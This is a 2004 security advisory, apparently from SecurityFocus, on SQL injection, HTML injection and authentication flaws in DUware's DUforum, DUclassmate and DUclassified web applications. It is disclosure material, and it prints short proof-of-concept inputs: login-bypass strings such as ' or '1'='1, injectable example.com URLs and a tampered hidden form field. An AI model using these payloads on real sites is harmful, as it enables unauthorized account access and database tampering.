DUware Software Multiple Remote Vulnerabilities
TITLE: DUware Software Multiple Remote Vulnerabilities
CLASS: Unknown
CVE:
REMOTE: Yes
LOCAL: No
PUBLISHED: Oct 11 2004 12:00AM
UPDATE: Oct 11 2004 12:00AM
CREDIT: Discovery is credited to Soroosh Dalili <s-dalili@cc.sbu.ac.ir>.
VULNERABLE:
DUware DUforum 3.1NOT VULNERABLE:
DUware DUforum 3.0
DUware DUclassmate 1.1
DUware DUclassmate 1.0
DUware DUclassified 4.2
DUware DUclassified 4.1
DUware DUclassified 4.0
Vai alla pagina originale su Security Focus
Discussion
Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account.
DUclassmate may allow unauthorized remote attackers to gain access to a computer.
DUclassified is reported prone to multiple SQL injection vulnerabilities.
SQL injection issues also affect DUforum.
DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities.
Exploit
No exploit is required.
The following proof of concept examples are available:
DUclassmate:
<input type="hidden" name="MM_recordId" value="[Your ID Number]">
DUclassified:
http://www.example.com/DUclassified/admin/
user= admin' or '1'='1
http://www.example.com/DUclassified/adDe tail.asp?cat_id=1;[SQL INJECT]&sub_id=1;[SQL INJECT]
DUforum:
user= admin
password= ' or '1'='1
http://www.example.com/DUforum/messages.asp?FOR_ID=1;[SQL INJECT]
http://www.example.com/DUforum/messageDetail.asp?MSG_ID=1;[SQL INJECT]
Solution
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.
References
References:
- DUclassified Input Validation Holes (SecurityTracker)
- DUclassmate Authentication Flaw (SecurityTracker)
- DUforum Input Validation Holes (SecurityTracker)
- DUware Homepage (DUware)